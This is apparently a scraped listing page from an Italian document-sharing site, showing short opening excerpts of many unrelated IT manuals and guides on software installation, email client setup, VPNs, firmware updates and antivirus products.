Sistemi di Antivirus CEFRIEL. Politecnico di Milano. Consorzio per la Formazione e la Ricerca in Ingegneria dell Informazione. Politecnico di Milano Consorzio per la Formazione e la Ricerca in Ingegneria dell Informazione Politecnico di Milano Sistemi di Antivirus CEFRIEL Politecnico di Milano Antivirus I sistemi di antivirus sono dei software che

Dettagli

VADEMECUM TECNICO. Per PC con sistema operativo Windows XP Windows Vista - Windows 7

VADEMECUM TECNICO. Per PC con sistema operativo Windows XP Windows Vista - Windows 7 VADEMECUM TECNICO Per PC con sistema operativo Windows XP Windows Vista - Windows 7 1) per poter operare in Server Farm bisogna installare dal cd predisposizione ambiente server farm i due file: setup.exe

Dettagli

Guida rapida per l utilizzo del servizio OwnCloud-MIUR (versione 1.6)

Guida rapida per l utilizzo del servizio OwnCloud-MIUR (versione 1.6) Sommario Introduzione... 2 L utilizzo dell OwnCloud con il browser.... 3 Istruzioni per l installazione del client OwnCloud... 4 Utilizzo del client OwnCloud per il caricamento dei giustificativi contabili....

Dettagli

BMSO1001. Virtual Configurator. Istruzioni d uso 02/10-01 PC

BMSO1001. Virtual Configurator. Istruzioni d uso 02/10-01 PC BMSO1001 Virtual Configurator Istruzioni d uso 02/10-01 PC 2 Virtual Configurator Istruzioni d uso Indice 1. Requisiti Hardware e Software 4 1.1 Requisiti Hardware 4 1.2 Requisiti Software 4 2. Concetti

Dettagli

Configurazione di Outlook Express

Configurazione di Outlook Express OUTLOOK Outlook Express è il client di posta elettronica sviluppato da Microsoft, preinstallato su sistemi operativi Windows a partire da Windows 98 fino all'uscita di Windows XP. Con l'arrivo di Windows

Dettagli

Metodo Condomini e MultiDialogo

Metodo Condomini e MultiDialogo Metodo Condomini e MultiDialogo Cos è MultiDialogo? MultiDialogo è un servizio web fornito dall azienda NetBuilder Srl di Parma che si occupa di stampa, imbustamento, affrancatura ed invio di comunicazioni,

Dettagli

Consiglio regionale della Toscana. Regole per il corretto funzionamento della posta elettronica

Consiglio regionale della Toscana. Regole per il corretto funzionamento della posta elettronica Consiglio regionale della Toscana Regole per il corretto funzionamento della posta elettronica A cura dell Ufficio Informatica Maggio 2006 Indice 1. Regole di utilizzo della posta elettronica... 3 2. Controllo

Dettagli

Studi di Settore. Nota Operativa 22/4/2013

Studi di Settore. Nota Operativa 22/4/2013 Nota Operativa Studi di Settore 22/4/2013 Sommario Valutazione casistiche... 2 Errore di connessione... 2 Sistema operativo non aggiornato... 2 File non installato client... 2 File non installato server...

Dettagli

Comando Generale Arma dei Carabinieri

Comando Generale Arma dei Carabinieri Comando Generale Arma dei Carabinieri Configurazioni per il collegamento al CONNECTRA Si Applica a: Windows 2000 sp4; Windows XP sp2; Data: 03 settembre 2007 Numero Revisione: 2.1 Configurazione per il

Dettagli

GUIDA UTENTE MONEY TRANSFER MANAGER

GUIDA UTENTE MONEY TRANSFER MANAGER GUIDA UTENTE MONEY TRANSFER MANAGER (vers. 1.0.2) GUIDA UTENTE MONEY TRANSFER MANAGER (vers. 1.0.2)... 1 Installazione... 2 Prima esecuzione... 5 Login... 7 Funzionalità... 8 Anagrafica... 9 Registrazione

Dettagli

Installazione di GFI Network Server Monitor

Installazione di GFI Network Server Monitor Installazione di GFI Network Server Monitor Requisiti di sistema I computer che eseguono GFI Network Server Monitor richiedono: i sistemi operativi Windows 2000 (SP4 o superiore), 2003 o XP Pro Windows

Dettagli

Product Updater. Scaricamento e Installazione aggiornamento

Product Updater. Scaricamento e Installazione aggiornamento CUBE AZIENDA CUBE TAGLIE & COLORI CUBE AUTOTRASPORTI EXPERT UP Product Updater Scaricamento e Installazione aggiornamento Attenzione! REQUISITO ESSENZIALE PER SCARICARE PRODUCT UPDATER È AVERE INSTALLATO

Dettagli

Client - Server. Client Web: il BROWSER

Client - Server. Client Web: il BROWSER Client - Server Client Web: il BROWSER Il client Web è un applicazione software che svolge il ruolo di interfaccia fra l utente ed il WWW, mascherando la complessità di Internet. Funzioni principali Inviare

Dettagli

MANUALE UTENTE Fiscali Free

MANUALE UTENTE Fiscali Free MANUALE UTENTE Fiscali Free Le informazioni contenute in questa pubblicazione sono soggette a modifiche da parte della ComputerNetRimini. Il software descritto in questa pubblicazione viene rilasciato

Dettagli

Sharpdesk V3.3. Guida all installazione Versione 3.3.04

Sharpdesk V3.3. Guida all installazione Versione 3.3.04 Sharpdesk V3.3 Guida all installazione Versione 3.3.04 Copyright 2000-2009 di SHARP CORPORATION. Tutti i diritti riservati. È vietata la riproduzione, l adattamento o la traduzione senza previa autorizzazione

Dettagli

LaCie Ethernet Disk mini Domande frequenti (FAQ)

LaCie Ethernet Disk mini Domande frequenti (FAQ) LaCie Ethernet Disk mini Domande frequenti (FAQ) Installazione Che cosa occorre fare per installare l unità LaCie Ethernet Disk mini? A. Collegare il cavo Ethernet alla porta LAN sul retro dell unità LaCie

Dettagli

Registratori di Cassa

Registratori di Cassa modulo Registratori di Cassa Interfacciamento con Registratore di Cassa RCH Nucleo@light GDO BREVE GUIDA ( su logiche di funzionamento e modalità d uso ) www.impresa24.ilsole24ore.com 1 Sommario Introduzione...

Dettagli

PROGETTO PER LA TRASMISSIONE DOCUMENTI RELATIVI ALL APPROVAZIONE DELLE MANIFESTAZIONI IN FORMA DIGITALE

PROGETTO PER LA TRASMISSIONE DOCUMENTI RELATIVI ALL APPROVAZIONE DELLE MANIFESTAZIONI IN FORMA DIGITALE PROGETTO PER LA TRASMISSIONE DOCUMENTI RELATIVI ALL APPROVAZIONE DELLE MANIFESTAZIONI IN FORMA DIGITALE L approvazione di una manifestazione nazionale od internazionale comporta spesso la trasmissione

Dettagli

FRANCESCO MARINO - TELECOMUNICAZIONI

FRANCESCO MARINO - TELECOMUNICAZIONI Classe: Data Gruppo: Alunni assenti Al termine di questa esercitazione ciascun alunno dovrà essere in grado di installare, configurare e utilizzare Microsoft Fax in Windows 95, 98 o Me. Le fasi di installazione

Dettagli

Procedure di ripristino del sistema.

Procedure di ripristino del sistema. Procedure di ripristino del sistema. Procedure adatte a sistemi con sistema operativo Microsoft Windows 7 In questo manuale verranno illustrate tutte le procedure che potrete utilizzare per creare dei

Dettagli

La VPN con il FRITZ!Box Parte I. La VPN con il FRITZ!Box Parte I

La VPN con il FRITZ!Box Parte I. La VPN con il FRITZ!Box Parte I La VPN con il FRITZ!Box Parte I 1 Descrizione Ogni utente di Internet può scambiare dati ed informazioni con qualunque altro utente della rete. I dati scambiati viaggiano nella nuvola attraverso una serie

Dettagli

TRASMISSIONE RAPPORTO ARBITRALE IN FORMATO PDF

TRASMISSIONE RAPPORTO ARBITRALE IN FORMATO PDF TRASMISSIONE RAPPORTO ARBITRALE IN FORMATO PDF Come da disposizioni di inizio stagione, alcune Delegazioni provinciali hanno richiesto la trasmissione dei referti arbitrali solo tramite fax o tramite mail.

Dettagli

DINAMIC: gestione assistenza tecnica

DINAMIC: gestione assistenza tecnica DINAMIC: gestione assistenza tecnica INSTALLAZIONE SU SINGOLA POSTAZIONE DI LAVORO PER SISTEMI WINDOWS 1. Installazione del software Il file per l installazione del programma è: WEBDIN32.EXE e può essere

Dettagli

Cos è ND Rifiuti 2008?

Cos è ND Rifiuti 2008? ND - Rifiuti 2008 Software per intermediari Controllo di gestione Amministrazione Scadenzario Gestione documenti Creazione modello MUD Stampa registro di carico / scarico Cos è ND Rifiuti 2008? ND - Rifiuti

Dettagli

Che cosa è un VIRUS?

Che cosa è un VIRUS? Virus & Antivirus Virus Nella sicurezza informatica un virus è un software, appartenente alla categoria dei malware, che è in grado, una volta eseguito, di infettare dei file in modo da riprodursi facendo

Dettagli

SCENARI D'UTILIZZO DELLE NUOVE SOLUZIONI. Fabrizio Cassoni Content Security Manager fc@symbolic.it

SCENARI D'UTILIZZO DELLE NUOVE SOLUZIONI. Fabrizio Cassoni Content Security Manager fc@symbolic.it SCENARI D'UTILIZZO DELLE NUOVE SOLUZIONI Fabrizio Cassoni Content Security Manager fc@symbolic.it Agenda: Introduzione a FSAV Client Security Nuove feature Gestione tramite Policy Manager Introduzione

Dettagli

illustrativa Affidabile, veloce, trasparente.

illustrativa Affidabile, veloce, trasparente. illustrativa Affidabile, veloce, trasparente. Che cosa è Modulo.XM? Modulo.XM è un modulo creato all interno del programma gestionale Mago.Net per integrare al meglio la piattaforma di gestione documentale

Dettagli

Replica con TeraStation 3000/4000/5000/7000. Buffalo Technology

Replica con TeraStation 3000/4000/5000/7000. Buffalo Technology Replica con TeraStation 3000/4000/5000/7000 Buffalo Technology Introduzione La funzione di replica consente di sincronizzare una cartella in due diversi dispositivi TeraStation quasi in tempo reale. Il

Dettagli

ICARO Terminal Server per Aprile

ICARO Terminal Server per Aprile ICARO Terminal Server per Aprile Icaro è un software aggiuntivo per Aprile (gestionale per centri estetici e parrucchieri) con funzionalità di terminal server: gira sullo stesso pc dove è installato il

Dettagli

Documentazione illustrativa

Documentazione illustrativa Documentazione illustrativa 1. INTRODUZIONE... 3 2. DESCRIZIONE SOMMARIA DEL SOFTWARE... 3 2.1 L aiuto fornito dalle tabelle... 3 2.2 Gestione dei manifesti di arrivo e di partenza... 4 2.3 Stampa del

Dettagli

Domande e risposte su Avira ProActiv Community

Domande e risposte su Avira ProActiv Community Domande e risposte su Avira ProActiv Community Avira AntiVir versione 10 sfrutta un innovativa tecnologia protettiva cloud-based, denominata ProActiv, che identifica e blocca i nuovi virus non appena questi

Dettagli

File, Modifica, Visualizza, Strumenti, Messaggio

File, Modifica, Visualizza, Strumenti, Messaggio Guida installare account in Outlook Express Introduzione Questa guida riguarda di sicuro uno dei programmi maggiormente usati oggi: il client di posta elettronica. Tutti, ormai, siamo abituati a ricevere

Dettagli

Sophos Computer Security Scan Guida di avvio

Sophos Computer Security Scan Guida di avvio Sophos Computer Security Scan Guida di avvio Versione prodotto: 1.0 Data documento: febbraio 2010 Sommario 1 Software...3 2 Cosa fare...3 3 Preparazione per la scansione...3 4 Installazione del software...4

Dettagli

Kroll Ontrack Servizi RDR Guida rapida

Kroll Ontrack Servizi RDR Guida rapida Kroll Ontrack Servizi RDR Guida rapida Selezionare una macchina Windows che sia in grado di funzionare come client remoto. É possibile utilizzare Windows XP e versioni successive ad eccezione di Windows

Dettagli

Procedura aggiornamento firmware

Procedura aggiornamento firmware Procedura aggiornamento firmware Sommario Introduzione... 3 Caratteristiche versione firmware... 3 Strumentazione necessaria e requisiti di base... 3 Operazioni preliminari... 4 Procedura aggiornamento...

Dettagli

Software per Helpdesk

Software per Helpdesk Software per Helpdesk Padova - maggio 2010 Antonio Dalvit - www.antoniodalvit.com Cosa è un helpdesk? Un help desk è un servizio che fornisce informazioni e assistenza ad utenti che hanno problemi nella

Dettagli

CERTIFICATI DIGITALI. Manuale Utente

CERTIFICATI DIGITALI. Manuale Utente CERTIFICATI DIGITALI Procedure di installazione, rimozione, archiviazione Manuale Utente versione 1.0 pag. 1 pag. 2 di30 Sommario CERTIFICATI DIGITALI...1 Manuale Utente...1 Sommario...2 Introduzione...3

Dettagli

Procedure di ripristino del sistema.

Procedure di ripristino del sistema. Procedure di ripristino del sistema. Procedura adatta a sistemi con sistema operativo Microsoft Windows 8 In questo manuale verranno illustrate tutte le procedure che potrete utilizzare per creare dei

Dettagli

Procedure di ripristino del sistema.

Procedure di ripristino del sistema. Procedure di ripristino del sistema. Procedura adatta a sistemi con sistema operativo Microsoft Windows 8.1 In questo manuale verranno illustrate tutte le procedure che potrete utilizzare per creare dei

Dettagli

Manuale d uso [Rev.1 del 07/08/2015] Manutenzione impianti termici Ver. 1.0.6 [05/01/2015]

Manuale d uso [Rev.1 del 07/08/2015] Manutenzione impianti termici Ver. 1.0.6 [05/01/2015] Manuale d uso [Rev.1 del 07/08/2015] Manutenzione impianti termici Ver. 1.0.6 [05/01/2015] Realizzato e distribuito da LeggeraSoft Sommario Introduzione... 2 Installare il programma... 2 Tasto licenza...

Dettagli

Istruzioni di installazione di IBM SPSS Modeler Text Analytics (licenza per sito)

Istruzioni di installazione di IBM SPSS Modeler Text Analytics (licenza per sito) Istruzioni di installazione di IBM SPSS Modeler Text Analytics (licenza per sito) Le seguenti istruzioni sono relative all installazione di IBM SPSS Modeler Text Analytics versione 15 mediante un licenza

Dettagli

Ricezione fax integrata e faxtomail

Ricezione fax integrata e faxtomail Ricezione fax integrata e faxtomail 1 Introduzione In questa mini-guida illustreremo come configurare ed utilizzare una delle più interessanti funzionalità del centralino integrato del FRITZ!Box 1 : la

Dettagli

Supporto On Line Allegato FAQ

Supporto On Line Allegato FAQ Supporto On Line Allegato FAQ FAQ n.ro MAN-8NQLJY70768 Data ultima modifica 26/01/2012 Prodotto Dichiarazioni Fiscali 2012 Modulo Studi di Settore Oggetto Servizio di attivazione Studi WKI In giallo le

Dettagli

19. LA PROGRAMMAZIONE LATO SERVER

19. LA PROGRAMMAZIONE LATO SERVER 19. LA PROGRAMMAZIONE LATO SERVER Introduciamo uno pseudocodice lato server che chiameremo Pserv che utilizzeremo come al solito per introdurre le problematiche da affrontare, indipendentemente dagli specifici

Dettagli

Reti di calcolatori ed indirizzi IP

Reti di calcolatori ed indirizzi IP ITIS TASSINARI, 1D Reti di calcolatori ed indirizzi IP Prof. Pasquale De Michele 5 aprile 2014 1 INTRODUZIONE ALLE RETI DI CALCOLATORI Cosa è una rete di calcolatori? Il modo migliore per capire di cosa

Dettagli

Banca dati Professioniste in rete per le P.A. Guida all uso per le Professioniste

Banca dati Professioniste in rete per le P.A. Guida all uso per le Professioniste Banca dati Professioniste in rete per le P.A. Guida all uso per le Professioniste versione 2.1 24/09/2015 aggiornamenti: 23-set-2015; 24-set-2015 Autore: Francesco Brunetta (http://www.francescobrunetta.it/)

Dettagli

Procedura aggiornamento firmware H02

Procedura aggiornamento firmware H02 Procedura aggiornamento firmware H02 Sommario Introduzione... 3 Caratteristiche versione firmware... 3 Strumentazione necessaria e requisiti di base... 3 Procedura aggiornamento... 4 Appendice... 11 Risoluzione

Dettagli

UTILIZZO DEL SOFTWARE MONITOR

UTILIZZO DEL SOFTWARE MONITOR UTILIZZO DEL SOFTWARE MONITOR Il software Monitor è stato realizzato per agevolare la realizzazione dei sondaggi. Esso consente di 1. creare questionari a scelta multipla; 2. rispondere alle domande da

Dettagli

MANUALE PARCELLA FACILE PLUS INDICE

MANUALE PARCELLA FACILE PLUS INDICE MANUALE PARCELLA FACILE PLUS INDICE Gestione Archivi 2 Configurazioni iniziali 3 Anagrafiche 4 Creazione prestazioni e distinta base 7 Documenti 9 Agenda lavori 12 Statistiche 13 GESTIONE ARCHIVI Nella

Dettagli

OmniAccessSuite. Plug-Ins. Ver. 1.3

OmniAccessSuite. Plug-Ins. Ver. 1.3 OmniAccessSuite Plug-Ins Ver. 1.3 Descrizione Prodotto e Plug-Ins OmniAccessSuite OmniAccessSuite rappresenta la soluzione innovativa e modulare per il controllo degli accessi. Il prodotto, sviluppato

Dettagli

INDICE. IL CENTRO ATTIVITÀ... 3 I MODULI... 6 IL MY CLOUD ANASTASIS... 8 Il menu IMPORTA... 8 I COMANDI DEL DOCUMENTO...

INDICE. IL CENTRO ATTIVITÀ... 3 I MODULI... 6 IL MY CLOUD ANASTASIS... 8 Il menu IMPORTA... 8 I COMANDI DEL DOCUMENTO... MANCA COPERTINA INDICE IL CENTRO ATTIVITÀ... 3 I MODULI... 6 IL MY CLOUD ANASTASIS... 8 Il menu IMPORTA... 8 I COMANDI DEL DOCUMENTO... 12 I marchi registrati sono proprietà dei rispettivi detentori. Bologna

Dettagli

ELENCO CLIENTI FORNITORI Patch1

ELENCO CLIENTI FORNITORI Patch1 ELENCO CLIENTI FORNITORI Patch1 Il pacchetto P15_200ElencoCF_Patch1.exe contiene una serie di aggiornamenti alla procedura di generazione del file contenente l. Download: 1) Assicurarsi di avere una versione

Dettagli

COSTER. Import/Export su SWC701. SwcImportExport

COSTER. Import/Export su SWC701. SwcImportExport SwcImportExport 1 Con SWC701 è possibile esportare ed importare degli impianti dal vostro database in modo da tenere aggiornati più Pc non in rete o non facente capo allo stesso DataBase. Il caso più comune

Dettagli

Installazione di GFI WebMonitor

Installazione di GFI WebMonitor Installazione di GFI WebMonitor Requisiti di sistema di GFI WebMonitor Server Microsoft Windows 2000 (SP 3) o 2003. Microsoft ISA 2000 Server (non in modalità solo firewall) OPPURE Server Microsoft ISA

Dettagli

Procedura per la configurazione in rete di DMS.

Procedura per la configurazione in rete di DMS. Procedura per la configurazione in rete di DMS. Sommario PREMESSA... 2 Alcuni suggerimenti... 2 Utilizzo di NAS con funzione di server di rete - SCONSIGLIATO:... 2 Reti wireless... 2 Come DMS riconosce

Dettagli

Versione 2014. Installazione GSL. Copyright 2014 All Rights Reserved

Versione 2014. Installazione GSL. Copyright 2014 All Rights Reserved Versione 2014 Installazione GSL Copyright 2014 All Rights Reserved Indice Indice... 2 Installazione del programma... 3 Licenza d'uso del software... 3 Requisiti minimi postazione lavoro... 3 Requisiti

Dettagli

A tal fine il presente documento si compone di tre distinte sezioni:

A tal fine il presente documento si compone di tre distinte sezioni: Guida on-line all adempimento Questa guida vuole essere un supporto per le pubbliche amministrazioni, nella compilazione e nella successiva pubblicazione dei dati riguardanti i dirigenti sui siti istituzionali

Dettagli

CTVClient. Dopo aver inserito correttamente i dati, verrà visualizzata la schermata del tabellone con i giorni e le ore.

CTVClient. Dopo aver inserito correttamente i dati, verrà visualizzata la schermata del tabellone con i giorni e le ore. CTVClient Il CTVClient è un programma per sistemi operativi Windows che permette la consultazione e la prenotazione delle ore dal tabellone elettronico del Circolo Tennis Valbisenzio. Per utilizzarlo è

Dettagli

Ubiquity getting started

Ubiquity getting started Introduzione Il documento descrive I passi fondamentali per il setup completo di una installazione Ubiquity Installazione dei componenti Creazione del dominio Associazione dei dispositivi al dominio Versione

Dettagli

Capitolo 1 Installazione del programma

Capitolo 1 Installazione del programma Capitolo 1 Installazione del programma Requisiti Hardware e Software Per effettuare l installazione del software Linea Qualità ISO, il computer deve presentare una configurazione minima così composta:

Dettagli

30 giorni di prova gratuiti, entra nel sito www.mypckey.com scarica e installa subito mypckey

30 giorni di prova gratuiti, entra nel sito www.mypckey.com scarica e installa subito mypckey DA OGGI NON IMPORTA DOVE SEI, IL TUO PC DELL UFFICIO E SEMPRE A TUA DISPOSIZIONE! Installa solo un semplice programma (nessun hardware necessario!), genera la tua chiavetta USB, e sei pronto a prendere

Dettagli

VERSIONE 5.1/5.2 GUIDA RAPIDA PER WEBACCESS HTML 3

VERSIONE 5.1/5.2 GUIDA RAPIDA PER WEBACCESS HTML 3 VERSIONE 5.1/5.2 GUIDA RAPIDA PER WEBACCESS HTML 3 TM GUIDA RAPIDA DI GROUPWISE 5.2 GroupWise WebAccess consente di accedere alla posta e al calendario con qualsiasi browser Web compatibile HTML 3. Invio

Dettagli

2.1 Configurare il Firewall di Windows

2.1 Configurare il Firewall di Windows .1 Configurare il Firewall di Windows LIBRERIA WEB Due o più computer possono scambiare dati, informazioni o servizi di tipo diverso utilizzando una connessione. Quindi, spesso, ad una connessione fisica

Dettagli

Manuale d uso del software. Versione 1.0

Manuale d uso del software. Versione 1.0 Manuale d uso del software Versione 1.0 1 INDICE REQUISITI...3 REGISTRAZIONE...4 AMMINISTRAZIONE...6 REFERTAZIONE...8 ESEMPIO DI REFERTO...14 ASSISTENZA...15 2 REQUISITI Per poter utilizzare il software

Dettagli

pfcad Office Guida all installazione dei software pfcad

pfcad Office Guida all installazione dei software pfcad pfcad Office Guida all installazione dei software pfcad 1 pfcad Office Installazione Software 2 In questa breve guida, verranno illustrati i passaggi per installare o aggiornare il software pfcad. L aggiornamento

Dettagli

ACO Archiviazione Elettronica e Conservazione sostitutiva

ACO Archiviazione Elettronica e Conservazione sostitutiva ACO Archiviazione Elettronica e Conservazione sostitutiva Luglio 2013 INDICE A) INSTALLAZIONE DELL AGGIORNAMENTO... 2 AGGIORNAMENTO STAND ALONE/SERVER... 2 AGGIORNAMENTO CLIENT... 4 B) ELENCO MODIFICHE...

Dettagli